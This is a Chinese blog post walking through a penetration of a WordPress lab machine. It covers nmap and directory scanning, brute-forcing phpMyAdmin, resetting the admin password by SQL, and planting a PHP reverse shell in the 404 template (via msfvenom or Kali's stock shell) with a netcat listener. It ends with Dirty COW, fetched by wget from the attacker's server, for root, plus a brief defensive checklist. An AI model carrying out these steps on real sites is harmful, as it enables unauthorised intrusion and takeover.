首页 > 其他分享 >渗透--WordPress网站

渗透--WordPress网站

时间:2023-05-29 20:55:39浏览次数:40  
标签:shell 漏洞 -- kali 渗透 WordPress dirty 网站 权限

WordPress简介
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统( CMS )来使用。
WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用PHP语言和MySQL数据库开发的,用户可以在支持 PHP 和 MySQL数据库的服务器上使用自己的博客。

第一步,信息收集

(1)主机发现:arp-scan -l  查看同一局域网下的主机

主机发现也采用 arp-scan、netdiscover、fping等工具

 

(2)端口扫描:使用namp对发现的主机IP进行扫描

命令:nmap -sS -SV -p- -v -T4 靶机IP

 (3)dirb目录遍历

目录扫描工具还有:dirb、dirbuster、gobuster、御剑

寻找敏感文件//

例如找到了phpmyadmin的mysql数据库登陆页面,以及wp-admin管理员登陆页面

进入mysql数据库:

方法一:使用弱口令登陆,默认下未修改的账号/密码可尝试登陆:root

方法二:使用phpmyadmin多线程批量破解工具进行爆破

 在成功破解到密码后,我们发现可以修改。或者添加用户。我们为登陆的用户进行修改 ps:因为密码经过了MD5等格式的加密,不容易破解,我们为了方便可以进行修改密码

 为了方便wp-admin管理员页面顺利登陆我们可以修改密码

例如:我们将密码重新设置为‘123456’:

update wp-users set user_pass=md5("123456") where user_login= 'cleverbao';

 因为靶场问题:些许靶机部分数据段字段,例如wp的ip地址需要进行修改,才能完成此实验

将后面改成自己kali的地址

 在一系列的操作完成后,我们就可以正常的去登陆后逃跑://靶机ip/wp-admin,输入账号密码。进入后台

 第二步,权限提升

 

生成shell

方法一:利用MSF生成反弹shell:msfvenom -p php/meterpreter/reverse_tcp(生成一个webshell的类型) LHOST=Kali的IP LPORT=4444(监听端口) -o Desktop/shell.php

一旦网站执行了上传的马,我们将有控制网站的权利

方法二:

利用kali Linux自带的反弹shell

终端输入:cat /usr/share/webshells/php/php-reverse-shell.php查找木马代码

复制此shell代码到404模版,修改IP为kali地址,端口为4444

 点击外观,选择里面的编辑,选择404模版,将代码复制到404模版插入反弹shell

 获取shell

使用netcat,类似于中国菜刀,监听4444端口:nc -nlvp 4444

 

浏览器访问不存在的页面,触发404文件执行,例如http://靶机ip/?p=666

 使用命令whoami,查看当前权限

如果当前权限不是root权限需要进行提权

注:$代表一般用户权限,#代表root权限

使用命令:uname -a  // 可以查看当前系统的内核

 权限提升-漏洞概述

 

漏洞原理
Linux内核的内存子系统在处理写入时复制(copy-on-write,COW)时产生了竞争条件(race condition )。恶意用户可利用此漏洞,来获取高杠限,对只读内存映射进行写访问
竞争条件,指的是任务执行顺序异常,可导致应用崩溃,或令攻击者有机可乘,进一步执行其他代码。利用这一漏洞,攻击者可在其目标系统提升权限,甚至可能获得root权限.

 下载漏洞到kali,发现代码是使用c语言编写的,我们到kali里面就需要用到gcc工具去编译

 下载到kali桌面并进入目录,

使用gcc编译:gcc -pthread dirty.c(文件) -o(输出) dirt(生成该工具文件) -lcrypt

我们需要该文件工具具有执行的权限:ls -l dirt    chmod +x dirty

使用python开启http服务器

python -m SimpleHTTPServer 80

 靶场那边则需要通过反弹的shell,进入靶机/tmp目录,使用wget下载dirty文件

命令为:wget http://kali的IP/dirty

 执行dirty完成提权,获得登陆信息

命令:./dirty new_password(任意密码)

 

3.3 思路总结 - 渗透全过程(红队 )
主机发现,扫描和识别端口服务,找到22、80、3306

目录扫描,找到敏感目录,包括数据库和网站后台

手工尝试登录数据库后台,修改网站账号密码

利用网站账号登录网站后台,上传网站木马( shell )

执行网站木马获取低权限shell,判断系统版本寻找提权方法

使用Dirty Cow 漏洞提权,获取管理员账号实现Root 权限

 

3.3 思路总结 - 防御全过程(蓝队 )
关闭不需要的端口,遵循最小化原则
使用常见网站CMS时,修改默认后台路径
使用PhpmyAdmin时,修改默认路径和密码
升级操作系统版本,不定时打补丁修复漏洞
关注最新漏洞情报,提升安全运维响应能力

 

3.3 思路总结-渗透工具汇总
主机扫描 : nmap、arp-scan、netdiscover

目录遍历 : dirb、dirbuster、gobuster、御剑

漏洞挖掘与利用: phpmyadmin、burp、msf、netcat

权限提升:dirty cow、gcc

 

带验证码的表单爆破工具:pkav

标签:shell,漏洞,--,kali,渗透,WordPress,dirty,网站,权限
From: https://www.cnblogs.com/aidy/p/17441635.html

相关文章

  • 欢乐结训赛题解
    欢乐结训赛题解A题目链接题目大意给你一个字符串,让你求字符串中最大的字母在字母表中排第几例如codeforces中s的是最大的s在字母表中排19位代码#include<bits/stdc++.h>usingnamespacestd;constintN=2e5+10;constintmod=1e9+7;voidsolve()......
  • AUTOCAD二次开发系列教程02-创建实体过程的理解
    目录01案例02步骤讲解03关键类理解04总结05源码地址01案例创建一个圆usingAutodesk.AutoCAD.ApplicationServices.Core;usingAutodesk.AutoCAD.DatabaseServices;usingAutodesk.AutoCAD.Geometry;usingAutodesk.AutoCAD.Runtime;namespaceHello.Cad.App01{......
  • 001_常见的DOS命令
    常见的DOS命令#查看目录下的全部文件dir#切换目录cd#返回上级cd..#清理屏幕cls#查看电脑ipipconfig#打开应用 计算器calc 图画mspaint 记事本notepad#ping命令ping#文件操作 md目录名(创建文件夹) rd目录名(移除文件夹) cd>文件名(进入文件) del文件名(删除文件......
  • Codeforces Round 875 (Div. 2)
    Preface难得现场打一次,这天下午打了三个半小时的校内赛,然后八点打了两小时ARC,最后再接上两个半小时的CF真是爽歪歪不过有一说一其实很多时候都在坐牢,这场CF也差不多,一个小时写完ABCD然后开始坐牢,其实E基本想出来了但是没想到用随机赋值的方法来实现不过由于这场手很稳因此排名......
  • 思考-关于做事专注力提高
    情况概述最近几日,先是写第二篇小论文正文部分,极度的专注和高效,没有听音乐、小说等,就是安安静静的写论文,找资料,从下午睡醒到晚上一直持续。第二个现象是在初稿快结束的时候,由于求速度,很多内容都是草草了事,但也不排除是因为不知道怎么去写。第三个场景是老师返稿意见,我第一天是......
  • tailwindcss在使用cdn引入静态html的时候,使用vscode代码提示
    原文:Hey!TheIntellisenseextensiondoesneedaconfigfiletoworktoday.Iwouldsuggestcreatingoneinyourprojectroottoenabletheextension.Anemptyfilewillworkjustfineforthiscaseifthedefaultssuityourneeds.Ifyouwanttocustomiz......
  • WPF概述
    文章来源:WindowsPresentationFoundation-WPF.NETFrameworkWPF概述WindowsPresentationFoundation(WPF)可以创建适用于Windows且具有非凡视觉效果的桌面客户端应用程序。WPF的核心是一个与分辨率无关且基于矢量的呈现引擎,旨在充分利用现代图形硬件。WPF通过一......
  • 奇怪的数据库切换问题
    今天从mysql单实例切换到OB,暴露了一个奇怪的问题:一个select语句,在单实例mysql中对时间排序查询,即使时间重复,顺序也是固定的。而在OB中,因为是分布式,从不同实例查询拼接,如果时间重复,那几次相同查询,顺序会变化。哈哈哈哈,因为分布式不是强一致的,从不同节点拉数据会有时差,只要符合当......
  • 1.docker简介与常用命令
    1.简介1.1.介绍Docker是基于Go语言实现的云开源项目。Docker的主要目标是Build,ShipandRunAnyApp,Anywhere,也就是通过对应用组件的封装、分发、部署、运行等生命周期的管理,使用户的APP(可以是一个WEB应用或数据库应用等等)及其运行环境能够做到“一次镜像,处处运行”。Docker......
  • Generative AI 新世界 | 走进文生图(Text-to-Image)领域
    在之前的四篇“GenerativeAI新世界”中,我们带领大家一起探索了生成式AI(GenerativeAI),以及大型语言模型(LLMs)的全新世界概览。并在文本生成(TextGeneration)领域做了一些概述、相关论文解读、以及在亚马逊云科技的落地实践和动手实验。亚马逊云科技开发者社区为开发者们提供......